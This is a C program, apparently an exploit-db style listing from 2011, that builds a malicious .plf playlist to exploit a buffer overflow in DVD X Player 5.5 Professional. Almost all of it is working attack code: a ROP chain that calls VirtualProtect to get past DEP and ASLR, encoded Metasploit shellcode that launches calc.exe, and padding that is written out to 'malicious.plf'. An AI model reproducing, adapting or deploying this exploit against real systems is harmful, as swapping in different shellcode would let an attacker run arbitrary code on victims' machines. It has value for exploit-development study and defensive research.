|
// # Author: sickness // # Take a look at mona.py :) awesome tool developed by corelanc0d3r and his team: https://www.corelan.be/index.php/2011/07/14/mona-py-the-manual/ // # ----------------------------------------------------------- // # Exploit Title: DVD X Player 5.5 Professional (.plf) Universal DEP + ASLR BYPASS // # Software Download: http://www.dvd-x-player.com/download.html#dvdPlayer // # Date: 30/08/2011 // # PoC: http://www.exploit-db.com/exploits/17745/ // # Tested on: Windows XP SP2, Windows XP SP3, Windows 7 // # Testers: _ming, g0tmi1k, corelanc0d3r, ryujin, sinn3r O_o.
#include <stdio.h> #include <string.h> #include <stdlib.h>
main() {
char rop[] = "\x02\x67\x62\x61" // # POP EAX # RETN [EPG.dll] "\x90\x90\x90\x90" // # PADDING "\x90\x90\x90\x90" // # PADDING "\x90\x90\x90\x90" // # PADDING "\x90\x90\x90\x90" // # PADDING "\x08\x11\x01\x10" // # POINTER TO VirtualProtect() [IAT SkinScrollBar.Dll] "\xed\x06\x63\x61" // # MOV EAX,DWORD PTR DS:[EAX] # RETN [EPG.dll] "\xd8\x85\x63\x61" // # XCHG EAX,ESI # RETN 00 [EPG.dll] "\x02\xd2\x62\x61" // # POP EBP # RETN [EPG.dll] "\xc8\xca\x60\x61" // # PUSH ESP [EPG.dll] "\x02\x67\x62\x61" // # POP EAX # RETN [EPG.dll] "\xff\xfa\xff\xff" // # AFTER NEGATE --> 0x00000501 "\x9c\x7d\x62\x61" // # NEG EAX # RETN [EPG.dll] "\x24\x01\x64\x61" // # XCHG EAX,EBX # RETN [EPG.dll] "\x02\x67\x62\x61" // # POP EAX # RETN [EPG.dll] "\xc0\xff\xff\xff" // # AFTER NEGATE --> 0x00000040 "\x9c\x7d\x62\x61" // # NEG EAX # RETN [EPG.dll] "\xa2\x8b\x60\x61" // # XCHG EAX,EDX # RETN [EPG.dll] "\x04\xb8\x60\x61" // # POP ECX # RETN [EPG.dll] "\x01\xb0\x64\x61" // # WRITABLE LOCATION [EPG.dll] "\x87\xe5\x62\x61" // # POP EDI # RETN [EPG.dll] "\x1d\x08\x63\x61" // # RETN (ROP NOP) [EPG.dll] "\x02\x67\x62\x61" // # POP EAX # RETN [EPG.dll] "\x90\x90\x90\x90" // # PADDING "\x31\x08\x62\x61"; // # PUSHAD # RETN [EPG.dll] // # msfpayload windows/exec CMD=calc.exe R | msfencode -b "\x00\x0a\x0d\x1a" -t c // # Around 400 bytes for shellcode :) char sc[] = "\xba\x7a\x70\x9a\xd3\xd9\xc0\xd9\x74\x24\xf4\x5e\x31\xc9\xb1" "\x33\x31\x56\x12\x83\xc6\x04\x03\x2c\x7e\x78\x26\x2c\x96\xf5" "\xc9\xcc\x67\x66\x43\x29\x56\xb4\x37\x3a\xcb\x08\x33\x6e\xe0" "\xe3\x11\x9a\x73\x81\xbd\xad\x34\x2c\x98\x80\xc5\x80\x24\x4e" "\x05\x82\xd8\x8c\x5a\x64\xe0\x5f\xaf\x65\x25\xbd\x40\x37\xfe" "\xca\xf3\xa8\x8b\x8e\xcf\xc9\x5b\x85\x70\xb2\xde\x59\x04\x08" "\xe0\x89\xb5\x07\xaa\x31\xbd\x40\x0b\x40\x12\x93\x77\x0b\x1f" "\x60\x03\x8a\xc9\xb8\xec\xbd\x35\x16\xd3\x72\xb8\x66\x13\xb4" "\x23\x1d\x6f\xc7\xde\x26\xb4\xba\x04\xa2\x29\x1c\xce\x14\x8a" "\x9d\x03\xc2\x59\x91\xe8\x80\x06\xb5\xef\x45\x3d\xc1\x64\x68" "\x92\x40\x3e\x4f\x36\x09\xe4\xee\x6f\xf7\x4b\x0e\x6f\x5f\x33" "\xaa\xfb\x4d\x20\xcc\xa1\x1b\xb7\x5c\xdc\x62\xb7\x5e\xdf\xc4" "\xd0\x6f\x54\x8b\xa7\x6f\xbf\xe8\x58\x3a\xe2\x58\xf1\xe3\x76" "\xd9\x9c\x13\xad\x1d\x99\x97\x44\xdd\x5e\x87\x2c\xd8\x1b\x0f" "\xdc\x90\x34\xfa\xe2\x07\x34\x2f\x81\xc6\xa6\xb3\x68\x6d\x4f" "\x51\x75";
char *exploit=malloc(900),*junk=malloc(260),*junk2=malloc(15),*junk3=malloc(20); memset(junk,0x41,260); memset(junk2,0x90,15); memset(junk3,0x90,20); strcpy(exploit,junk); strcat(exploit,rop); strcat(exploit,junk2); strcat(exploit,sc); strcat(exploit,junk3);
printf("\nDVD X Player Professional/Standard 5.5\n"); printf("Author: sickness\n"); printf("Creating malicious .plf file, please wait.\n"); usleep(50000);
FILE *evil; evil=fopen("malicious.plf","w"); fwrite(exploit,1,900,evil); fclose(evil); printf("File created!\n\n");
return 0; }
|